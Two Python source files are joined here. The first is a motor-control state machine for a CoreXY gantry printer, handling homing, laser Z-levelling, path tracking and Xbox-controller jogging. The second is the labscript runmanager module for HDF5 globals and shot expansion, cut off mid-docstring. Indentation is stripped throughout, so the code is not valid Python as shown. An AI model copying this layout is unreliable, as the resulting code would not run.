control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=control_3)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=control_4)
write(control_packet)
class HomeState(State):
def __init__(self):
super().__init__()
self.event_map['found home'] = FineHomeState
enable_fiducial_sensing()
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.DISABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.ENABLE)
write(control_packet)
def run(self):
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=1)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=HOMING_SPEED)
write(control_packet)
e_x, e_y = get_error()
if e_x is not None or e_y is not None:
post_event('found home')
class FineHomeState(State):
home_3 = 0
home_4 = 0
def __init__(self):
super().__init__()
self.event_map['fine home complete'] = JogHomeCenterState
self.event_map['lost tracking'] = HomeState
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.ENABLE)
write(control_packet)
def run(self):
global home_x, home_y
e_x, e_y = get_error()
if e_x is None or e_y is None:
post_event("lost tracking")
return
errorx = -e_x + e_y
errory = -e_x - e_y
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=-errory/10)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=-errorx/10)
write(control_packet)
if np.sqrt(errorx**2 + errory**2) < 1:
enable_laser_sensing()
FineHomeState.home_4 = embedded_motors[4].theta
FineHomeState.home_3 = embedded_motors[3].theta
post_event('fine home complete')
class JogHomeState(JogState):
def __init__(self):
super().__init__()
self.home_event = 'at home'
self.home_x = 30
self.home_y = 30
def run(self):
super().run()
errorx = self.home_x-self.xpos
errory = self.home_y-self.ypos
control_x = errorx*20 - self.xvel*10
control_y = errory*20 - self.yvel*20
control_3, control_4 = corexy_transform(control_x, control_y)
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_ALPHA, control=control_3)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_ALPHA, control=control_4)
write(control_packet)
if np.sqrt(errorx**2 + errory**2) < .005:
post_event(self.home_event)
class HomeZState(State):
def __init__(self):
super().__init__()
enable_laser_sensing()
self.motor_index = 'all'
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[2].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[1].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[0].motorId, pkt.MotorCommand.ENABLE)
write(control_packet)
def run(self):
z_nominal = np.clip(get_laser_displacement()/10, -10, 10)
if self.motor_index == 'all':
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[2].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[1].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[0].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
write(control_packet)
else:
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
for motor in embedded_motors:
if embedded_motors[motor].motorId != self.motor_index:
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[motor].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
else:
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[self.motor_index].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
write(control_packet)
if z_nominal == 0:
post_event('z home')
class JogHomeCenterState(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = HomeCenterState
self.set_jog_target(30, 30, 5)
class HomeCenterState(HomeZState):
def __init__(self):
super().__init__()
self.event_map['z home'] = JogHome0State
class JogHome0State(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = HomeZ0State
self.set_jog_target(z0[0], z0[1], 5)
class HomeZ0State(HomeZState):
def __init__(self):
super().__init__()
self.motor_index = 0
self.event_map['z home'] = JogHome1State
class JogHome1State(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = HomeZ1State
self.set_jog_target(z1[0], z1[1], 5)
class HomeZ1State(HomeZState):
def __init__(self):
super().__init__()
self.event_map['z home'] = JogHome2State
self.motor_index = 1
class JogHome2State(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = HomeZ2State
self.set_jog_target(z2[0], z2[1], 5)
class HomeZ2State(HomeZState):
def __init__(self):
super().__init__()
self.event_map['z home'] = Jog00State
self.motor_index = 2
class Jog00State(JogState):
def __init__(self):
super().__init__()
self.event_map['jog done'] = ManualState
self.set_jog_target(0, 0, 5)
class PrintState(JogState):
def __init__(self):
super().__init__()
self.start_time = time()
def run(self):
super().run()
global errorx, errory
KP = 5000
KP_VELOCITY = 1000
positions, velocities = path_planner.get_solution(time()-self.start_time)
position = positions[0]
x_nominal = position[0]/XY_MM_PER_RAD
y_nominal = position[1]/XY_MM_PER_RAD
z_nominal = position[2]/Z_MM_PER_RAD
x_velocity_nominal = velocities[0]/XY_MM_PER_RAD
y_velocity_nominal = velocities[1]/XY_MM_PER_RAD
z_velocity_nominal = velocities[2]/Z_MM_PER_RAD
v_errorx = x_velocity_nominal - self.xvel
v_errory = y_velocity_nominal - self.yvel
errorx = x_nominal - self.xpos
control_inputx = KP*errorx + KP_VELOCITY*v_errorx
errory = y_nominal - self.ypos
control_inputy = KP*errory + KP_VELOCITY*v_errory
control3, control4 = corexy_transform(control_inputx, control_inputy)
# errorz2 = z_nominal - embedded_motors[2].theta
# control_inputz2 = KP*errorz2 + KP_VELOCITY*(z_velocity_nominal - embedded_motors[2].omega)
# errorz1 = z_nominal - embedded_motors[1].theta
# control_inputz1 = KP*errorz1 + KP_VELOCITY*(z_velocity_nominal - embedded_motors[1].omega)
# errorz0 = z_nominal - embedded_motors[0].theta
# control_inputz0 = KP*errorz0 + KP_VELOCITY*(z_velocity_nominal - embedded_motors[0].omega)
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_ALPHA, control=control4)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_ALPHA, control=control3)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[2].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[1].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[0].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
write(control_packet)
class ManualState(State):
Z_JOG = 30
XY_JOG = 20
def __init__(self):
super().__init__()
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[4].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[3].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[2].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[1].motorId, pkt.MotorCommand.ENABLE)
control_packet += pkt.pack_MotorCommandPacket(embedded_motors[0].motorId, pkt.MotorCommand.ENABLE)
write(control_packet)
def run(self):
if jog_controller.button_a.is_pressed:
z_nominal = (controller.trigger_l.value - controller.trigger_r.value)
if abs(z_nominal) < .2:
z_nominal = 0
z_nominal *= ManualState.Z_JOG
x_nominal = controller.axis_l.x
if abs(x_nominal) < .2:
x_nominal = 0
x_nominal *= ManualState.XY_JOG
y_nominal = controller.axis_l.y
if abs(y_nominal) < .2:
y_nominal = 0
y_nominal *= ManualState.XY_JOG
else:
z_nominal = 0
y_nominal = 0
x_nominal = 0
motor_3_control, motor_4_control = corexy_transform(x_nominal, y_nominal)
control_packet = pkt.pack_HeaderPacket(command=pkt.SerialCommand.RUN_MOTOR, motorCount=5)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[2].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[1].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[0].motorId, pkt.MotorCommand.SET_OMEGA, control=z_nominal)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=motor_3_control)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=motor_4_control)
write(control_packet)
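# embedded_service() is the main control loop: each HID message begins with a
# HeaderPacket, followed by header.motorCount MotorStatePackets and
# header.sensorCount SensorPackets. After refreshing embedded_motors and
# embedded_sensors it handles at most one queued event and runs the current state.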
def embedded_service():
global state
state = InitState()
while True:
hid_msg = read()
header = pkt.unpack_HeaderPacket(hid_msg[:pkt.size_HeaderPacket])
unpack_index = pkt.size_HeaderPacket
for i in range(header.motorCount):
motor_packet = pkt.unpack_MotorStatePacket(
hid_msg[unpack_index:unpack_index+pkt.size_MotorStatePacket])
embedded_motors[motor_packet.motorId] = motor_packet
unpack_index += pkt.size_MotorStatePacket
for i in range(header.sensorCount):
sensor_packet = pkt.unpack_SensorPacket(
hid_msg[unpack_index:unpack_index+pkt.size_SensorPacket])
embedded_sensors[sensor_packet.sensorId] = sensor_packet
unpack_index += pkt.size_SensorPacket
handle_events()
state.run()
if __name__ == "__main__":
os.system(f"taskset -p -c 3 {os.getpid()}")
cold_start(sys.argv[1])
with Xbox360Controller(0, axis_threshold=0.2) as controller:
start_time = time()
jog_controller = controller
tracking_thread = Thread(target=run_tracking_loop, daemon=True)
tracking_thread.start()
print("Started tracking")
sleep(2)
embedded_thread = Thread(target=embedded_service, daemon=True)
embedded_thread.start()
print("Started controls")
while True:
sleep(1)
# print(embedded_motors[4].theta, embedded_motors[3].theta, errorx, errory)
# print(-100/XY_MM_PER_RAD, embedded_motors[3].theta, home_y)
# print((-100/XY_MM_PER_RAD + home_y) - embedded_motors[3].theta)
# print(state)
# pos_error = math.sqrt(errorx**2 + errory**2)*XY_MM_PER_RAD
# vel_error = math.sqrt(v_errorx**2 + v_errory**2)*XY_MM_PER_RAD
# print(str(pos_error).ljust(30, ' '))
# print(str(pos_error))
# pos, vel = path_planner.get_solution(time()-start_time)
# print(pos[0], vel)
print(embedded_motors, state, jog_controller.button_a.is_pressed)
# print(get_laser_displacement(), get_error(), state, controller.trigger_l.value)
# print(corexy_inverse(embedded_motors[3].theta - FineHomeState.home_3, embedded_motors[4].theta- FineHomeState.home_4))
|
__init__.py
|
#####################################################################
# #
# /__init__.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program runmanager, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
str = unicode
import itertools
import os
import sys
import random
import time
import subprocess
import types
import threading
import traceback
import labscript_utils.h5_lock
import h5py
import numpy as np
import zprocess
__version__ = '2.1.0'
def _ensure_str(s):
"""convert bytestrings and numpy strings to python strings"""
return s.decode() if isinstance(s, bytes) else str(s)
def is_valid_python_identifier(name):
import tokenize
if PY2:
import StringIO as io
else:
import io
try:
tokens = list(tokenize.generate_tokens(io.StringIO(name).readline))
except tokenize.TokenError:
return False
if len(tokens) == 2:
(token_type, _, _, _, _), _ = tokens
return token_type == tokenize.NAME
return False
class ExpansionError(Exception):
"""An exception class so that error handling code can tell when a
parsing exception was caused by a mismatch with the expansion mode"""
pass
class TraceDictionary(dict):
def __init__(self, *args, **kwargs):
self.trace_data = None
dict.__init__(self, *args, **kwargs)
def start_trace(self):
self.trace_data = []
def __getitem__(self, key):
if self.trace_data is not None:
if key not in self.trace_data:
self.trace_data.append(key)
return dict.__getitem__(self, key)
def stop_trace(self):
trace_data = self.trace_data
self.trace_data = None
return trace_data
def new_globals_file(filename):
with h5py.File(filename, 'w') as f:
f.create_group('globals')
def add_expansion_groups(filename):
"""backward compatability, for globals files which don't have
expansion groups. Create them if they don't exist. Guess expansion
settings based on datatypes, if possible."""
# DEPRECATED
# Don't open in write mode unless we have to:
with h5py.File(filename, 'r') as f:
requires_expansion_group = []
for groupname in f['globals']:
group = f['globals'][groupname]
if not 'expansion' in group:
requires_expansion_group.append(groupname)
if requires_expansion_group:
group_globalslists = [get_globalslist(filename, groupname) for groupname in requires_expansion_group]
with h5py.File(filename, 'a') as f:
for groupname, globalslist in zip(requires_expansion_group, group_globalslists):
group = f['globals'][groupname]
subgroup = group.create_group('expansion')
# Initialise all expansion settings to blank strings:
for name in globalslist:
subgroup.attrs[name] = ''
groups = {group_name: filename for group_name in get_grouplist(filename)}
sequence_globals = get_globals(groups)
evaled_globals, global_hierarchy, expansions = evaluate_globals(sequence_globals, raise_exceptions=False)
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
value = evaled_globals[group_name][global_name]
expansion = guess_expansion_type(value)
set_expansion(filename, group_name, global_name, expansion)
def get_grouplist(filename):
    # For backward compatibility, add 'expansion' settings to this
# globals file, if it doesn't contain any. Guess expansion settings
# if possible.
# DEPRECATED
add_expansion_groups(filename)
with h5py.File(filename, 'r') as f:
grouplist = f['globals']
# File closes after this function call, so have to
# convert the grouplist generator to a list of strings
# before its file gets dereferenced:
return list(grouplist)
def new_group(filename, groupname):
with h5py.File(filename, 'a') as f:
if groupname in f['globals']:
raise Exception('Can\'t create group: target name already exists.')
group = f['globals'].create_group(groupname)
group.create_group('units')
group.create_group('expansion')
def copy_group(source_globals_file, source_groupname, dest_globals_file, delete_source_group=False):
""" This function copies the group source_groupname from source_globals_file
to dest_globals_file and renames the new group so that there is no name
    collision. If delete_source_group is False, the copied group gets the
    suffix '_copy'."""
with h5py.File(source_globals_file, 'a') as source_f:
# check if group exists
if source_groupname not in source_f['globals']:
raise Exception('Can\'t copy there is no group "{}"!'.format(source_groupname))
        # Are we copying from one file to another?
if dest_globals_file is not None and source_globals_file != dest_globals_file:
dest_f = h5py.File(dest_globals_file, 'a') # yes -> open dest_globals_file
else:
            dest_f = source_f  # no -> dest file is the source file
        # rename group until there are no name collisions
i = 0 if not delete_source_group else 1
dest_groupname = source_groupname
while dest_groupname in dest_f['globals']:
dest_groupname = "{}({})".format(dest_groupname, i) if i > 0 else "{}_copy".format(dest_groupname)
i += 1
# copy group
dest_f.copy(source_f['globals'][source_groupname], '/globals/%s' % dest_groupname)
        # close opened file
if dest_f != source_f:
dest_f.close()
return dest_groupname
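# Example (hypothetical names): copying group 'MOT' into a file that already
# contains 'MOT' yields 'MOT_copy'; further collisions append '(1)', '(2)', ...
# to the candidate name until a free name is found. With delete_source_group=True
# the numbered suffixes are used straight away ('MOT(1)', ...).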
def rename_group(filename, oldgroupname, newgroupname):
if oldgroupname == newgroupname:
# No rename!
return
with h5py.File(filename, 'a') as f:
if newgroupname in f['globals']:
raise Exception('Can\'t rename group: target name already exists.')
f.copy(f['globals'][oldgroupname], '/globals/%s' % newgroupname)
del f['globals'][oldgroupname]
def delete_group(filename, groupname):
with h5py.File(filename, 'a') as f:
del f['globals'][groupname]
def get_globalslist(filename, groupname):
with h5py.File(filename, 'r') as f:
group = f['globals'][groupname]
# File closes after this function call, so have to convert
# the attrs to a dict before its file gets dereferenced:
return dict(group.attrs)
def new_global(filename, groupname, globalname):
if not is_valid_python_identifier(globalname):
raise ValueError('%s is not a valid Python variable name'%globalname)
with h5py.File(filename, 'a') as f:
group = f['globals'][groupname]
if globalname in group.attrs:
raise Exception('Can\'t create global: target name already exists.')
group.attrs[globalname] = ''
f['globals'][groupname]['units'].attrs[globalname] = ''
f['globals'][groupname]['expansion'].attrs[globalname] = ''
def rename_global(filename, groupname, oldglobalname, newglobalname):
if oldglobalname == newglobalname:
# No rename!
return
if not is_valid_python_identifier(newglobalname):
raise ValueError('%s is not a valid Python variable name'%newglobalname)
value = get_value(filename, groupname, oldglobalname)
units = get_units(filename, groupname, oldglobalname)
expansion = get_expansion(filename, groupname, oldglobalname)
with h5py.File(filename, 'a') as f:
group = f['globals'][groupname]
if newglobalname in group.attrs:
raise Exception('Can\'t rename global: target name already exists.')
group.attrs[newglobalname] = value
group['units'].attrs[newglobalname] = units
group['expansion'].attrs[newglobalname] = expansion
del group.attrs[oldglobalname]
del group['units'].attrs[oldglobalname]
del group['expansion'].attrs[oldglobalname]
def get_value(filename, groupname, globalname):
with h5py.File(filename, 'r') as f:
value = f['globals'][groupname].attrs[globalname]
# Replace numpy strings with python unicode strings.
# DEPRECATED, for backward compat with old files
value = _ensure_str(value)
return value
def set_value(filename, groupname, globalname, value):
with h5py.File(filename, 'a') as f:
f['globals'][groupname].attrs[globalname] = value
def get_units(filename, groupname, globalname):
with h5py.File(filename, 'r') as f:
value = f['globals'][groupname]['units'].attrs[globalname]
# Replace numpy strings with python unicode strings.
# DEPRECATED, for backward compat with old files
value = _ensure_str(value)
return value
def set_units(filename, groupname, globalname, units):
with h5py.File(filename, 'a') as f:
f['globals'][groupname]['units'].attrs[globalname] = units
def get_expansion(filename, groupname, globalname):
with h5py.File(filename, 'r') as f:
value = f['globals'][groupname]['expansion'].attrs[globalname]
# Replace numpy strings with python unicode strings.
# DEPRECATED, for backward compat with old files
value = _ensure_str(value)
return value
def set_expansion(filename, groupname, globalname, expansion):
with h5py.File(filename, 'a') as f:
f['globals'][groupname]['expansion'].attrs[globalname] = expansion
def delete_global(filename, groupname, globalname):
with h5py.File(filename, 'a') as f:
group = f['globals'][groupname]
del group.attrs[globalname]
def guess_expansion_type(value):
if isinstance(value, np.ndarray) or isinstance(value, list):
return u'outer'
else:
return u''
def iterator_to_tuple(iterator, max_length=1000000):
# We want to prevent infinite length tuples, but we cannot know
# whether they are infinite or not in advance. So we'll convert to
# a tuple only if the length is less than max_length:
temp_list = []
for i, element in enumerate(iterator):
temp_list.append(element)
if i == max_length:
raise ValueError('This iterator is very long, possibly infinite. ' +
'Runmanager cannot create an infinite number of shots. ' +
'If you really want an iterator longer than %d, ' % max_length +
'please modify runmanager.iterator_to_tuple and increase max_length.')
return tuple(temp_list)
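# e.g. iterator_to_tuple(x**2 for x in range(4)) == (0, 1, 4, 9); an iterator
# yielding more than max_length items raises ValueError instead of looping forever.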
def get_all_groups(h5_files):
"""returns a dictionary of group_name: h5_path pairs from a list of h5_files."""
if isinstance(h5_files, bytes) or isinstance(h5_files, str):
h5_files = [h5_files]
groups = {}
for path in h5_files:
for group_name in get_grouplist(path):
if group_name in groups:
raise ValueError('Error: group %s is defined in both %s and %s. ' % (group_name, groups[group_name], path) +
'Only uniquely named groups can be used together '
'to make a run file.')
groups[group_name] = path
return groups
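# Example (hypothetical paths): get_all_groups(['a.h5', 'b.h5']) might return
# {'MOT': 'a.h5', 'imaging': 'b.h5'}; a group name present in both files raises
# a ValueError.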
def get_globals(groups):
"""Takes a dictionary of group_name: h5_file pairs and pulls the
globals out of the groups in their files. The globals are strings
storing python expressions at this point. All these globals are
packed into a new dictionary, keyed by group_name, where the values
are dictionaries which look like {global_name: (expression, units, expansion), ...}"""
# get a list of filepaths:
filepaths = set(groups.values())
sequence_globals = {}
for filepath in filepaths:
groups_from_this_file = [g for g, f in groups.items() if f == filepath]
with h5py.File(filepath, 'r') as f:
for group_name in groups_from_this_file:
sequence_globals[group_name] = {}
globals_group = f['globals'][group_name]
values = dict(globals_group.attrs)
units = dict(globals_group['units'].attrs)
expansions = dict(globals_group['expansion'].attrs)
for global_name, value in values.items():
unit = units[global_name]
expansion = expansions[global_name]
# Replace numpy strings with python unicode strings.
# DEPRECATED, for backward compat with old files
value = _ensure_str(value)
unit = _ensure_str(unit)
expansion = _ensure_str(expansion)
sequence_globals[group_name][global_name] = value, unit, expansion
return sequence_globals
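# Example of the returned structure (hypothetical values):
#   {'MOT': {'detuning': ('2*pi*10e6', 'Hz', ''),
#            'ramp_times': ('linspace(0, 1, 5)', 's', 'outer')}}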
def evaluate_globals(sequence_globals, raise_exceptions=True):
"""Takes a dictionary of globals as returned by get_globals. These
globals are unevaluated strings. Evaluates them all in the same
namespace so that the expressions can refer to each other. Iterates
to allow for NameErrors to be resolved by subsequently defined
globals. Throws an exception if this does not result in all errors
going away. The exception contains the messages of all exceptions
which failed to be resolved. If raise_exceptions is False, any
evaluations resulting in an exception will instead return the
exception object in the results dictionary"""
# Flatten all the groups into one dictionary of {global_name:
# expression} pairs. Also create the group structure of the results
# dict, which has the same structure as sequence_globals:
all_globals = {}
results = {}
expansions = {}
global_hierarchy = {}
# Pre-fill the results dictionary with groups, this is needed for
# storing exceptions in the case of globals with the same name being
# defined in multiple groups (all of them get the exception):
for group_name in sequence_globals:
results[group_name] = {}
multiply_defined_globals = set()
for group_name in sequence_globals:
for global_name in sequence_globals[group_name]:
if global_name in all_globals:
# The same global is defined twice. Either raise an
# exception, or store the exception for each place it is
# defined, depending on whether raise_exceptions is True:
groups_with_same_global = []
for other_group_name in sequence_globals:
if global_name in sequence_globals[other_group_name]:
groups_with_same_global.append(other_group_name)
exception = ValueError('Global named \'%s\' is defined in multiple active groups:\n ' % global_name +
'\n '.join(groups_with_same_global))
if raise_exceptions:
raise exception
for other_group_name in groups_with_same_global:
results[other_group_name][global_name] = exception
multiply_defined_globals.add(global_name)
all_globals[global_name], units, expansion = sequence_globals[group_name][global_name]
expansions[global_name] = expansion
# Do not attempt to evaluate globals which are multiply defined:
for global_name in multiply_defined_globals:
del all_globals[global_name]
# Eval the expressions in the same namespace as each other:
evaled_globals = {}
# we use a "TraceDictionary" to track which globals another global depends on
sandbox = TraceDictionary()
exec('from pylab import *', sandbox, sandbox)
exec('from runmanager.functions import *', sandbox, sandbox)
globals_to_eval = all_globals.copy()
previous_errors = -1
while globals_to_eval:
errors = []
for global_name, expression in globals_to_eval.copy().items():
# start the trace to determine which globals this global depends on
sandbox.start_trace()
try:
code = compile(expression, '<string>', 'eval')
value = eval(code, sandbox)
# Need to know the length of any generators, convert to tuple:
if isinstance(value, types.GeneratorType):
value = iterator_to_tuple(value)
# Make sure if we're zipping or outer-producting this value, that it can
# be iterated over:
if expansions[global_name] == 'outer':
try:
iter(value)
except Exception as e:
raise ExpansionError(str(e))
except Exception as e:
# Don't raise, just append the error to a list, we'll display them all later.
errors.append((global_name, e))
sandbox.stop_trace()
continue
# Put the global into the namespace so other globals can use it:
sandbox[global_name] = value
del globals_to_eval[global_name]
evaled_globals[global_name] = value
# get the results from the global trace
trace_data = sandbox.stop_trace()
# Only store names of globals (not other functions)
for key in list(trace_data): # copy the list before iterating over it
if key not in all_globals:
trace_data.remove(key)
if trace_data:
global_hierarchy[global_name] = trace_data
if len(errors) == previous_errors:
# Since some globals may refer to others, we expect maybe
# some NameErrors to have occured. There should be fewer
# NameErrors each iteration of this while loop, as globals
# that are required become defined. If there are not fewer
# errors, then there is something else wrong and we should
# raise it.
if raise_exceptions:
message = 'Error parsing globals:\n'
for global_name, exception in errors:
message += '%s: %s: %s\n' % (global_name, exception.__class__.__name__, exception.message if PY2 else str(exception))
raise Exception(message)
else:
for global_name, exception in errors:
evaled_globals[global_name] = exception
break
previous_errors = len(errors)
# Assemble results into a dictionary of the same format as sequence_globals:
for group_name in sequence_globals:
for global_name in sequence_globals[group_name]:
# Do not attempt to override exception objects already stored
# as the result of multiply defined globals:
if not global_name in results[group_name]:
results[group_name][global_name] = evaled_globals[global_name]
return results, global_hierarchy, expansions
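# Example (hypothetical globals): with expressions {'t0': '1.5', 't1': 't0 + 2'},
# 't1' may fail with a NameError on a pass made before 't0' is in the namespace
# and is resolved on a later pass; global_hierarchy would then record that 't1'
# depends on 't0'.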
def expand_globals(sequence_globals, evaled_globals, expansion_config = None, return_dimensions = False):
"""Expands iterable globals according to their expansion
settings. Creates a number of 'axes' which are to be outer product'ed
together. Some of these axes have only one element, these are globals
that do not vary. Some have a set of globals being zipped together,
iterating in lock-step. Others contain a single global varying
across its values (the globals set to 'outer' expansion). Returns
a list of shots, each element of which is a dictionary for that
shot's globals."""
if expansion_config is None:
order = {}
shuffle = {}
else:
order = {k:v['order'] for k,v in expansion_config.items() if 'order' in v}
shuffle = {k:v['shuffle'] for k,v in expansion_config.items() if 'shuffle' in v}
values = {}
expansions = {}
for group_name in sequence_globals:
for global_name in sequence_globals[group_name]:
expression, units, expansion = sequence_globals[group_name][global_name]
value = evaled_globals[group_name][global_name]
values[global_name] = value
expansions[global_name] = expansion
# Get a list of the zip keys in use:
zip_keys = set(expansions.values())
try:
zip_keys.remove('outer')
except KeyError:
pass
axes = {}
global_names = {}
dimensions = {}
for zip_key in zip_keys:
axis = []
zip_global_names = []
for global_name in expansions:
if expansions[global_name] == zip_key:
value = values[global_name]
if not zip_key:
# Wrap up non-iterating globals (with zip_key = '') in a
# one-element list. When zipped and then outer product'ed,
# this will give us the result we want:
value = [value]
axis.append(value)
zip_global_names.append(global_name)
axis = list(zip(*axis))
dimensions['zip '+zip_key] = len(axis)
axes['zip '+zip_key] = axis
global_names['zip '+zip_key] = zip_global_names
# Give each global being outer-product'ed its own axis. It gets
# wrapped up in a list and zipped with itself so that it is in the
# same format as the zipped globals, ready for outer-producting
# together:
for global_name in expansions:
if expansions[global_name] == 'outer':
value = values[global_name]
axis = [value]
axis = list(zip(*axis))
dimensions['outer '+global_name] = len(axis)
axes['outer '+global_name] = axis
global_names['outer '+global_name] = [global_name]
# add any missing items to order and dimensions
for key, value in axes.items():
if key not in order:
order[key] = -1
if key not in shuffle:
shuffle[key] = False
if key not in dimensions:
dimensions[key] = 1
# shuffle relevant axes
for axis_name, axis_values in axes.items():
if shuffle[axis_name]:
random.shuffle(axis_values)
# sort axes and global names by order
axes = [axes.get(key) for key in sorted(order, key=order.get)]
global_names = [global_names.get(key) for key in sorted(order, key=order.get)]
# flatten the global names
global_names = [global_name for global_list in global_names for global_name in global_list]
shots = []
for axis_values in itertools.product(*axes):
# values here is a tuple of tuples, with the outer list being over
# the axes. We need to flatten it to get our individual values out
# for each global, since we no longer care what axis they are on:
global_values = [value for axis in axis_values for value in axis]
shot_globals = dict(zip(global_names, global_values))
shots.append(shot_globals)
if return_dimensions:
return shots, dimensions
else:
return shots
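# Illustrative sketch (not part of the original module): how 'outer' and zipped
# expansions combine into shots. All group/global names and values below are
# hypothetical, chosen only to show the shapes involved.
def _example_expand_globals():
    sequence_globals = {
        'group1': {
            'freq': ('linspace(0, 1, 3)', 'MHz', 'outer'),  # own axis of 3 values
            'amp': ('[0.1, 0.2]', 'V', 'zipA'),             # zipped with 'phase'
            'phase': ('[0, 90]', 'deg', 'zipA'),
            'power': ('7', 'dBm', ''),                      # constant, does not vary
        }
    }
    evaled_globals = {
        'group1': {
            'freq': [0.0, 0.5, 1.0],
            'amp': [0.1, 0.2],
            'phase': [0, 90],
            'power': 7,
        }
    }
    shots = expand_globals(sequence_globals, evaled_globals)
    # 3 outer values x 2 zipped (amp, phase) pairs = 6 shots, each a dict like
    # {'freq': 0.0, 'amp': 0.1, 'phase': 0, 'power': 7}
    return shots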
def generate_sequence_id(scriptname):
"""Our convention for generating sequence ids. Just a timestamp and
the name of the labscript that the run file is to be compiled with."""
timestamp = time.strftime('%Y%m%dT%H%M%S', time.localtime())
scriptbase = os.path.basename(scriptname).split('.py')[0]
return timestamp + '_' + scriptbase
def make_run_files(output_folder, sequence_globals, shots, sequence_id, shuffle=False):
"""Does what it says. sequence_globals and shots are of the datatypes
returned by get_globals and get_shots, one is a nested dictionary with
string values, and the other a flat dictionary. sequence_id should
be some identifier unique to this sequence, use generate_sequence_id
to follow convention. shuffle will randomise the order that the run
files are generated in with respect to which element of shots they
come from. This function returns a *generator*. The run files are
not actually created until you loop over this generator (which gives
you the filepaths). This is useful for not having to clean up as many
unused files in the event of failed compilation of labscripts. If you
want all the run files to be created at some point, simply convert
the returned generator to a list. The filenames the run files are
